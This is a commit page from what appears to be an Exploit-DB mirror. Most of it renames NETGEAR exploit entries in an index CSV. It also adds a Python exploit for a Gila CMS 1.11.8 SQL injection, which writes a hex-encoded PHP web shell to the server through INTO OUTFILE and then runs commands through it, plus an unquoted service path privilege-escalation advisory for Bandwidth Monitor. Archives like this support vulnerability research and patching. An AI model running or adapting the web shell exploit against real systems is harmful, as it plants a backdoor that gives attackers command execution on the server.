bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-06-17

Browse source 
4 changes to exploits/shellcodes

NETGEAR SSL312 Router - Denial of Service
Netgear SSL312 Router - Denial of Service

NETGEAR WGR614v9 Wireless Router - Denial of Service
Netgear WGR614v9 Wireless Router - Denial of Service

NETGEAR DG632 Router - Remote Denial of Service
Netgear DG632 Router - Remote Denial of Service

NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service
Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service

NETGEAR ProSafe - Denial of Service
Netgear ProSafe - Denial of Service

NETGEAR WGR614 - Administration Interface Remote Denial of Service
Netgear WGR614 - Administration Interface Remote Denial of Service

NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation
Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation

Outline Service 1.3.3  - 'Outline Service ' Unquoted Service Path
Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path

Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path

NETGEAR WG102 - Leaks SNMP Write Password With Read Access
Netgear WG102 - Leaks SNMP Write Password With Read Access

NETGEAR DG632 Router - Authentication Bypass
Netgear DG632 Router - Authentication Bypass

NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure
Netgear WNR2000 FW 1.2.0.8 - Information Disclosure

NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)
Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)

NETGEAR FM114P Wireless Firewall - File Disclosure
Netgear FM114P Wireless Firewall - File Disclosure

NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure
Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure

NETGEAR FM114P ProSafe Wireless Router - Rule Bypass
Netgear FM114P ProSafe Wireless Router - Rule Bypass

NETGEAR RP114 3.26 - Content Filter Bypass
Netgear RP114 3.26 - Content Filter Bypass

NETGEAR DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)
Netgear DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit)

NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)
Netgear DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit)

NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow
Netgear MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow

NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow
Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow

NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit)
Netgear ReadyNAS - Perl Code Evaluation (Metasploit)

NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting
Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting

NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities
Netgear WNR2000 - Multiple Information Disclosure Vulnerabilities

NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities
Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities

NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution
Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution

NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)
Netgear NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit)
NETGEAR JNR1010 ADSL Router - (Authenticated) Remote File Disclosure
NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure
Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure
Netgear WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure

NETGEAR WNR2000v5 - Remote Code Execution
Netgear WNR2000v5 - Remote Code Execution

NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)
Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit)

NETGEAR WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)
Netgear WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit)

NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)
Netgear DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit)

NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)
Netgear - 'TelnetEnable' Magic Packet (Metasploit)

WordPress MU < 1.3.2 - active_plugins option Code Execution
WordPress MU < 1.3.2 - 'active_plugins' Code Execution

NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery
Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery

NETGEAR SPH200D - Multiple Vulnerabilities
Netgear SPH200D - Multiple Vulnerabilities

NETGEAR DGN1000B - Multiple Vulnerabilities
Netgear DGN1000B - Multiple Vulnerabilities

NETGEAR DGN2200B - Multiple Vulnerabilities
Netgear DGN2200B - Multiple Vulnerabilities

NETGEAR WNR1000 - Authentication Bypass
Netgear WNR1000 - Authentication Bypass

NETGEAR WPN824v3 - Unauthorized Configuration Download
Netgear WPN824v3 - Unauthorized Configuration Download

NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities
Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities

NETGEAR ProSafe - Information Disclosure
Netgear ProSafe - Information Disclosure

NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)
Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)

NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities
Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities

NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities
Netgear WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities

NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting
Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting

NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure
Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure

NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access
Netgear WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access

NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure
Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure

NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation
Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation

NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities
Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities

NETGEAR WNR1000v4 - Authentication Bypass
Netgear WNR1000v4 - Authentication Bypass

NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities
Netgear NMS300 ProSafe Network Management System - Multiple Vulnerabilities
NETGEAR R7000 - Command Injection
NETGEAR R7000 - Cross-Site Scripting
Netgear R7000 - Command Injection
Netgear R7000 - Cross-Site Scripting

NETGEAR Routers - Password Disclosure
Netgear Routers - Password Disclosure

NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution
Netgear DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution

NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution
Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution

NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery
Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery

Multiple  WordPress Plugins - Arbitrary File Upload
Multiple WordPress Plugins - Arbitrary File Upload

NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution
Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution

NETGEAR WiFi Router R6120 - Credential Disclosure
Netgear WiFi Router R6120 - Credential Disclosure

NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass
Netgear WiFi Router JWNR2010v5 / R6080 - Authentication Bypass

WordPress Plugin LearnDash  LMS 3.1.2 - Reflective Cross-Site Scripting
WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting

School File Management System 1.0  - 'username' SQL Injection
School File Management System 1.0 - 'username' SQL Injection

ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection
WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection

Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection
WordPress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection

Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)
WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated)

Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation
WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation

Joomla J2  Store 3.3.11 - 'filter_order_Dir'  SQL Injection (Authenticated)
Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated)
Netgear R7000 Router - Remote Code Execution
Gila CMS 1.11.8 - 'query' SQL Injection
This commit is contained in:
Offensive Security 2020-06-17 05:02:00 +00:00
parent bb9f12afc7
commit 8fc6092de1
5 changed files with 3811 additions and 71 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

3670
exploits/hardware/webapps/48588.py Executable file
View file

File diff suppressed because it is too large Load diff

2
exploits/multiple/webapps/48582.txt
View file

@ -1,4 +1,4 @@
# Exploit Title: Sysax MultiServer 6.90 - Reflected Cross Site Scripting
# Exploit Title: Sysax MultiServer 6.90 - Reflected Cross Site Scripting
# Google Dork: n.d.
# Date: 2020-06-02
# Exploit Author: Luca Epifanio (wrongsid3)

47
exploits/php/webapps/48590.py Executable file
View file

@ -0,0 +1,47 @@
# Exploit Title: Gila CMS 1.11.8 - 'query' SQL Injection
# Date: 2020-06-15
# Exploit Author: Carlos Ramírez L. (BillyV4)
# Vendor Homepage: https://gilacms.com/
# Software Link: https://github.com/GilaCMS/gila/releases/tag/1.11.8
# Version: Gila 1.11.8
# Tested on: Gila 1.11.8
# CVE : CVE-2020-5515
import requests as req
import time as vremeto
import sys as sistemot
import re as regularno
if len(sistemot.argv) < 2:
print("Usage: ./CVE_2020_5515.py ip:port")
sistemot.exit(19)
else:
ip = sistemot.argv[1]
cookies = {'PHPSESSID': 'r2k5bp52edr9ls36d35iohdlng', 'GSESSIONID': '21k2mbxockr9sf1v1agxkwpkt6ruzdl6vjz6fgmt7s0e72hlas'}
webpath = "/gila-1.11.8/admin/sql?query="
query1 = "SELECT id FROM user LIMIT 0,1 INTO OUTFILE "
localpath = "\'C://xampp//htdocs//"
shellname = "webshell.php\' "
query2 = "LINES TERMINATED BY "
print("[*] Injecting ")
cmdphp = "0x3c3f70687020696628697373657428245f524551554553545b27636d64275d29297"
cmdphp += "b2024636d64203d2028245f524551554553545b27636d64275d293b2073797374656d"
cmdphp += "2824636d64293b206563686f20273c2f7072653e24636d643c7072653e273b2064696"
cmdphp += "53b207d203f3e"
url = 'http://' + ip + webpath + query1 + localpath + shellname + query2 + cmdphp
r = req.get(url, cookies=cookies)
vremeto.sleep(1)
print("[*] Executing")
r = req.get("http://" + ip + "/" + shellname + "?cmd=whoami")
print("You have a webshell in http://" + ip + "/" + shellname "?cmd=command")

20
exploits/windows/local/48591.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path
# Exploit Author: Bobby Cooke
# Date: 2020-07-15
# Vendor Site: https://www.10-strike.com/
# Software Download: https://www.10-strike.com/bandwidth-monitor/bandwidth-monitor.exe
# Tested On: Windows 10 - Pro 1909 (x86)
# Version: Version 3.9
# Vulnerability Type:
# Local Privilege Escalation to LocalSystem by Unquoted Service Path.
# Vulnerability Description:
# The 10-Strike Bandwidth Monitor v3.9 services "Svc10StrikeBandMontitor", "Svc10StrikeBMWD", and "Svc10StrikeBMAgent" suffer
# from unquoted service path vulnerabilities that allow attackers to achieve Privilege Escalation to SYSTEM, at startup,
# by placing a malicious binary in the truncated service path; such as "C:\Program.exe".
C:\Users\boku>wmic service get name,pathname,startmode,StartName | findstr "10-Strike Bandwidth Monitor"
Svc10StrikeBandMonitor C:\Program Files\10-Strike Bandwidth Monitor\BMsvc.exe Auto LocalSystem
Svc10StrikeBMWD C:\Program Files\10-Strike Bandwidth Monitor\BMWDsvc.exe Auto LocalSystem
Svc10StrikeBMAgent C:\Program Files\10-Strike Bandwidth Monitor Agent\BMAgent.exe Auto LocalSystem

135
files_exploits.csv
View file

@ -940,7 +940,7 @@ id,file,description,date,author,type,platform,port
7986,exploits/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",dos,windows,
7990,exploits/windows/dos/7990.py,"UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)",2009-02-04,"Andres Luksenberg",dos,windows,
7995,exploits/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",dos,windows,
8008,exploits/hardware/dos/8008.txt,"NETGEAR SSL312 Router - Denial of Service",2009-02-09,Rembrandt,dos,hardware,
8008,exploits/hardware/dos/8008.txt,"Netgear SSL312 Router - Denial of Service",2009-02-09,Rembrandt,dos,hardware,
8013,exploits/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",dos,hardware,
8021,exploits/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service",2009-02-09,"Praveen Darshanam",dos,multiple,
8024,exploits/windows/dos/8024.py,"TightVNC - Authentication Failure Integer Overflow (PoC)",2009-02-09,desi,dos,windows,
@ -952,7 +952,7 @@ id,file,description,date,author,type,platform,port
8091,exploits/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - BODY onload Remote Crash",2009-02-23,Skylined,dos,multiple,
8099,exploits/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)",2009-02-23,"Guido Landi",dos,windows,
8102,exploits/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,dos,windows,
8106,exploits/hardware/dos/8106.txt,"NETGEAR WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,dos,hardware,
8106,exploits/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,dos,hardware,
8125,exploits/hardware/dos/8125.py,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",dos,hardware,
8129,exploits/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",dos,windows,
8135,exploits/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,dos,windows,
@ -1077,7 +1077,7 @@ id,file,description,date,author,type,platform,port
8955,exploits/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - 'syslog' Denial of Service",2009-06-15,h00die,dos,linux,
8957,exploits/multiple/dos/8957.txt,"Apple Safari / QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",dos,multiple,
8960,exploits/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,dos,linux,
8964,exploits/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",dos,hardware,
8964,exploits/hardware/dos/8964.txt,"Netgear DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",dos,hardware,
8971,exploits/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,dos,windows,
8976,exploits/multiple/dos/8976.pl,"Multiple HTTP Server - 'slowloris.pl' Low Bandwidth Denial of Service",2009-06-17,RSnake,dos,multiple,
8982,exploits/linux/dos/8982.txt,"Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)",2009-06-17,metalhoney,dos,linux,
@ -2819,7 +2819,7 @@ id,file,description,date,author,type,platform,port
22401,exploits/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",dos,windows,
22402,exploits/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - 'WriteAV' Crash (PoC)",2012-11-01,coolkaveh,dos,windows,
22406,exploits/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",dos,linux,
22407,exploits/hardware/dos/22407.txt,"NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",dos,hardware,
22407,exploits/hardware/dos/22407.txt,"Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",dos,hardware,
22415,exploits/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service",2003-03-24,"Piotr Chytla",dos,hardware,
22417,exploits/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (1)",2003-04-28,"Core Security",dos,windows,
22419,exploits/php/dos/22419.php,"PHP 4.3 - 'socket_iovec_alloc()' Integer Overflow",2003-03-25,"Sir Mordred",dos,php,
@ -3560,7 +3560,7 @@ id,file,description,date,author,type,platform,port
27764,exploits/linux/dos/27764.txt,"LibTiff 3.x - TIFFFetchData Integer Overflow",2006-04-28,"Tavis Ormandy",dos,linux,
27765,exploits/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",dos,linux,
27856,exploits/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",dos,linux,
27775,exploits/hardware/dos/27775.py,"NETGEAR ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",dos,hardware,
27775,exploits/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",dos,hardware,
27778,exploits/linux/dos/27778.txt,"Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow",2013-08-22,x90c,dos,linux,139
27790,exploits/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,dos,osx,
27791,exploits/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,dos,linux,
@ -4110,7 +4110,7 @@ id,file,description,date,author,type,platform,port
32551,exploits/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,dos,linux,
32573,exploits/windows/dos/32573.txt,"Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,dos,windows,
32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,
32583,exploits/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,dos,hardware,
32583,exploits/hardware/dos/32583.txt,"Netgear WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,dos,hardware,
32587,exploits/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,dos,windows,
32596,exploits/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial of Service",2008-11-20,"Christian Hoffmann",dos,multiple,
32657,exploits/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service",2008-12-12,NCNIPC,dos,windows,
@ -10046,7 +10046,7 @@ id,file,description,date,author,type,platform,port
40323,exploits/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,local,windows,
40330,exploits/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",local,windows,
40438,exploits/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,local,windows,
40442,exploits/windows/local/40442.txt,"NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows,
40442,exploits/windows/local/40442.txt,"Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows,
40443,exploits/windows/local/40443.txt,"Microsoft Windows Firewall Control - Unquoted Service Path Privilege Escalation",2016-10-03,zaeek,local,windows,
40450,exploits/linux/local/40450.txt,"Apache Tomcat 8/7/6 (Debian-Based Distros) - Local Privilege Escalation",2016-10-03,"Dawid Golunski",local,linux,
40451,exploits/windows_x86-64/local/40451.rb,"Street Fighter 5 - 'Capcom.sys' Kernel Execution (Metasploit)",2016-10-03,"OJ Reeves",local,windows_x86-64,
@ -11094,6 +11094,7 @@ id,file,description,date,author,type,platform,port
48570,exploits/windows/local/48570.py,"10-Strike Bandwidth Monitor 3.9 - Buffer Overflow (SEH_DEP_ASLR)",2020-06-10,boku,local,windows,
48573,exploits/windows/local/48573.txt,"WinGate 9.4.1.5998 - Insecure Folder Permissions",2020-06-10,hyp3rlinx,local,windows,
48579,exploits/windows/local/48579.py,"Frigate Professional 3.36.0.9 - 'Find Computer' Local Buffer Overflow (SEH) (PoC)",2020-06-11,"Paras Bhatia",local,windows,
48591,exploits/windows/local/48591.txt,"Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path",2020-06-16,boku,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -12180,7 +12181,7 @@ id,file,description,date,author,type,platform,port
7630,exploits/windows/remote/7630.html,"Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute",2009-01-01,JJunior,remote,windows,
7701,exploits/linux/remote/7701.txt,"Samba < 3.0.20 - Remote Heap Overflow",2009-01-08,zuc,remote,linux,445
7706,exploits/windows/remote/7706.mrc,"Anope IRC Services With bs_fantasy_ext 1.2.0-RC1 - mIRC script",2009-01-08,Phil,remote,windows,
7712,exploits/hardware/remote/7712.txt,"NETGEAR WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",remote,hardware,
7712,exploits/hardware/remote/7712.txt,"Netgear WG102 - Leaks SNMP Write Password With Read Access",2009-01-09,"Harm S.I. Vaittes",remote,hardware,
7739,exploits/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - Download File Insecure Method",2009-01-12,"Alfons Luja",remote,windows,
7747,exploits/windows/remote/7747.html,"Word Viewer OCX 3.2 - ActiveX 'Save' Remote File Overwrite",2009-01-13,Houssamix,remote,windows,
7748,exploits/windows/remote/7748.html,"Office Viewer ActiveX Control 3.0.1 - 'Save' Remote File Overwrite",2009-01-13,Houssamix,remote,windows,
@ -12319,7 +12320,7 @@ id,file,description,date,author,type,platform,port
8930,exploits/windows/remote/8930.txt,"ModSecurity 2.5.9 (Core Rules 2.5-1.6.1) - Filter Bypass",2009-06-11,"Lavakumar Kuppan",remote,windows,
8934,exploits/windows/remote/8934.py,"Apple iTunes 8.1.1.10 (Windows) - 'itms/itcp' Remote Buffer Overflow",2009-06-12,ryujin,remote,windows,
8938,exploits/windows/remote/8938.txt,"Green Dam 3.17 (Windows XP SP2) - 'URL' Remote Buffer Overflow",2009-06-12,seer[N.N.U],remote,windows,
8963,exploits/hardware/remote/8963.txt,"NETGEAR DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",remote,hardware,
8963,exploits/hardware/remote/8963.txt,"Netgear DG632 Router - Authentication Bypass",2009-06-15,"Tom Neaves",remote,hardware,
8969,exploits/windows/remote/8969.rb,"Green Dam 3.17 - URL Processing Buffer Overflow (Metasploit)",2009-06-16,Trancer,remote,windows,
8970,exploits/windows/remote/8970.txt,"McAfee 3.6.0.608 - 'naPolicyManager.dll' ActiveX Arbitrary Data Write",2009-06-16,callAX,remote,windows,
8986,exploits/windows/remote/8986.txt,"Edraw PDF Viewer Component < 3.2.0.126 - ActiveX Insecure Method",2009-06-18,Jambalaya,remote,windows,
@ -12352,7 +12353,7 @@ id,file,description,date,author,type,platform,port
9456,exploits/hardware/remote/9456.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Add Admin",2009-08-18,SuNHouSe2,remote,hardware,
9468,exploits/windows/remote/9468.py,"ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)",2009-08-18,Wraith,remote,windows,69
9473,exploits/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem - Arbitrary Configuration Access",2009-08-18,SuNHouSe2,remote,hardware,
9498,exploits/hardware/remote/9498.txt,"NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",remote,hardware,
9498,exploits/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 - Information Disclosure",2009-08-24,"Jean Trolleur",remote,hardware,
9500,exploits/windows/remote/9500.cpp,"NaviCOPA Web Server 3.01 - Remote Buffer Overflow",2009-08-24,SimO-s0fT,remote,windows,
9503,exploits/hardware/remote/9503.txt,"Huawei SmartAX MT880 - Multiple Cross-Site Request Forgery Vulnerabilities",2009-08-24,"Jerome Athias",remote,hardware,
9508,exploits/windows/remote/9508.rb,"ProFTP 2.9 - Welcome Message Remote Buffer Overflow (Metasploit)",2009-08-25,His0k4,remote,windows,
@ -12896,7 +12897,7 @@ id,file,description,date,author,type,platform,port
16383,exploits/windows/remote/16383.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_INITIALIZE_RF Buffer Overflow (Metasploit)",2010-11-30,Metasploit,remote,windows,
16384,exploits/windows/remote/16384.rb,"DATAC RealWin SCADA Server 2.0 (Build 6.1.8.10) - SCPC_TXTEVENT Buffer Overflow (Metasploit)",2010-11-24,Metasploit,remote,windows,
16385,exploits/windows/remote/16385.rb,"DATAC RealWin SCADA Server - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,
16388,exploits/hardware/remote/16388.rb,"NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,remote,hardware,
16388,exploits/hardware/remote/16388.rb,"Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit)",2010-07-03,Metasploit,remote,hardware,
16389,exploits/windows/remote/16389.rb,"Omni-NFS Server - Remote Buffer Overflow (Metasploit)",2010-11-11,Metasploit,remote,windows,
16390,exploits/windows/remote/16390.rb,"Arugizer Trojan Horse (Energizer DUO) - Code Execution (Metasploit)",2010-09-20,Metasploit,remote,windows,
16391,exploits/windows/remote/16391.rb,"EMC AlphaStor Agent - Remote Buffer Overflow (Metasploit)",2010-05-09,Metasploit,remote,windows,
@ -14792,7 +14793,7 @@ id,file,description,date,author,type,platform,port
22224,exploits/multiple/remote/22224.txt,"Epic Games Unreal Engine 436 - URL Directory Traversal",2003-02-05,"Auriemma Luigi",remote,multiple,
22226,exploits/windows/remote/22226.txt,"Microsoft Internet Explorer 5 - ShowHelp Arbitrary Command Execution",2003-02-05,"Andreas Sandblad",remote,windows,
22229,exploits/windows/remote/22229.pl,"Celestial Software AbsoluteTelnet 2.0/2.11 - Title Bar Buffer Overflow",2003-02-06,"Knud Erik Hojgaard",remote,windows,
22236,exploits/hardware/remote/22236.txt,"NETGEAR FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,remote,hardware,
22236,exploits/hardware/remote/22236.txt,"Netgear FM114P Wireless Firewall - File Disclosure",2003-02-10,stickler,remote,hardware,
22244,exploits/hardware/remote/22244.txt,"Ericsson HM220dp DSL Modem - World Accessible Web Administration Interface",2003-02-11,"Davide Del Vecchio",remote,hardware,
22251,exploits/multiple/remote/22251.sh,"AIX 3.x/4.x / Windows 95/98/2000/NT 4.0 / SunOS 5 - 'gethostbyname()' Remote Buffer Overflow",2006-09-28,RoMaNSoFt,remote,multiple,
22264,exploits/linux/remote/22264.txt,"OpenSSL 0.9.x - CBC Error Information Leakage",2003-02-19,"Martin Vuagnoux",remote,linux,
@ -14848,9 +14849,9 @@ id,file,description,date,author,type,platform,port
22448,exploits/windows/remote/22448.txt,"BEA WebLogic 7.0 - Hostname/NetBIOS Name Remote Information Disclosure",2003-04-02,"Michael Hendrickx",remote,windows,
22449,exploits/unix/remote/22449.c,"Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (1)",2003-04-02,Xpl017Elz,remote,unix,
22450,exploits/unix/remote/22450.c,"Passlog Daemon 0.1 - 'SL_Parse' Remote Buffer Overflow (2)",2003-04-02,Xpl017Elz,remote,unix,
